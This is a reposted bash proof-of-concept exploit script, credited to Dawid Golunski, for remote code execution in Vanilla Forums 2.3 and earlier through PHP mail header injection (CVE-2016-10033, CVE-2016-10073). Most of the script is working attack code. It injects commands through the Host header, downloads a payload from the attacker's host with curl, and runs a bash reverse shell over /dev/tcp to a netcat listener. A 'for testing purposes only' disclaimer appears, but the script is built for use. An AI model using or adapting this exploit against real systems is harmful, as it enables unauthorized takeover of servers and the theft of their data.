Vanilla Forums < 2.3 - Remote Code Execution
来源: 作者:Golunski 发布时间:2017-05-15
#!/bin/bash # # __ __ __ __ __ # / / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________ # / / / _ \/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/ # / /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,< / __/ / (__ ) # /_____/\___/\__, /\__,_/_/ /_/ /_/\__,_/\___/_/|_|\___/_/ /____/ # /____/ # # # Vanilla Forums <= 2.3 Remote Code Execution (RCE) PoC Exploit 0day # Core version (no plugins, default config.) # # CVE-2016-10033 (RCE) # CVE-2016-10073 (Header Injection) # # (ver. 1.0) # # # Discovered and coded by # # Dawid Golunski # # # # ExploitBox project: # # # # Exploit code: # # # Full advisory URL: # # # Related advisories: # # # # White-paper 'Pwning PHP mail() function For Fun And RCE' # # # # Usage: # ./ target-forum-url reverse_shell_ip # # Tested on: # Vanilla Core 2.3 # # # Disclaimer: # For testing purposes only # # # ----------------------------------------------------------------- # # Interested in vulnerabilities/exploitation? # # # .;lc' # .,cdkkOOOko;. # .,lxxkkkkOOOO000Ol' # .':oxxxxxkkkkOOOO0000KK0x:' # .;ldxxxxxxxxkxl,.'lk0000KKKXXXKd;. # ':oxxxxxxxxxxo;. .:oOKKKXXXNNNNOl. # '';ldxxxxxdc,. ,oOXXXNNNXd;,. # .ddc;,,:c;. ,c: .cxxc:;:ox: # .dxxxxo, ., ,kMMM0:. ., .lxxxxx: # .dxxxxxc lW. oMMMMMMMK d0 .xxxxxx: # .dxxxxxc .0k.,KWMMMWNo :X: .xxxxxx: # .dxxxxxc .xN0xxxxxxxkXK, .xxxxxx: # .dxxxxxc lddOMMMMWd0MMMMKddd. .xxxxxx: # .dxxxxxc .cNMMMN.oMMMMx' .xxxxxx: # .dxxxxxc lKo;dNMN.oMM0;:Ok. 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RCE Exploit \e[0m \e[94m|\e[0m" #sleep 1s echo -e "\e[94m+ --=|\e[0m \e[94m|\e[0m \e[94m+ --=|\e[0m Discovered & Coded By \e[94m|\e[0m \e[94m+ --=|\e[0m \033[94mDawid Golunski\033[0m \e[94m|\e[0m \e[94m+ --=|\e[0m \033[94m\033[0m \e[94m|\e[0m \e[94m+ --=|\e[0m \033[94m@dawid_golunski\033[0m \e[94m|\e[0m \e[94m+ --=|\e[0m \e[94m|\e[0m \e[94m+ --=|\e[0m \"With Great Power Comes Great Responsibility\" \e[94m|\e[0m \e[94m+ --=|\e[0m \e[91m*\e[0m For testing purposes only \e[91m*\e[0m \e[94m|\e[0m " echo -ne "\e[91m[*]\033[0m" read -p " Sure you want to get a shell on the target '$target' ? [y/N] " choice echo if [ "$choice" == "y" ]; then echo -e "\e[92m[*]\033[0m Guess I can't argue with that... Let's get started...\n" #sleep 2s #sleep 2s # Host payload on :80 RCE_exec_cmd="(sleep 5s && nohup bash -i >/dev/tcp/$rev_host/1337 0<&1 2>&1) &" echo "$RCE_exec_cmd" > rce.txt python -mSimpleHTTPServer 80 2>/dev/null >&2 & hpid=$! # POST data string data='hpt=&Target=discussions&Email=admin&Request+a+new+password=Request+a+new+password&DeliveryType=VIEW&DeliveryMethod=JSON' # Save payload on the target in /tmp/rce cmd="/usr/bin/curl -o/tmp/rce $rev_host/rce.txt" prep_host_header "$cmd" curl -H"Host: $host_header" -0 -s -i -d "$data" $target/entry/passwordrequest | grep -q "200 OK" if [ $? -ne 0 ]; then echo "[!] Failed conecting to the target URL. Exiting" exit 2 fi echo -e "\e[92m[+]\033[0m Connected to the target" echo -e "\n\e[92m[+]\e[0m Payload sent successfully" sleep 2s # Execute payload (RCE_exec_cmd) on the target /bin/bash /tmp/rce cmd="/usr/bin/nohup /bin/bash /tmp/rce" prep_host_header "$cmd" #echo -e "Host Payload2: \nHost: $host_header" curl -H"Host: $host_header" -s -0 -i -d "$data" $target/entry/passwordrequest >/dev/null 2>&1 & echo -e "\n\e[92m[+]\033[0m Payload executed!" echo -e "\n\e[92m[*]\033[0m Waiting for the target to send us a \e[94mreverse shell\e[0m...\n" nc -vv -l 1337 #killall python echo else echo -e "\e[92m[+]\033[0m Responsible choice ;) Exiting.\n" exit 0 fi #kill -9 $hpid echo "Exiting..." exit 0
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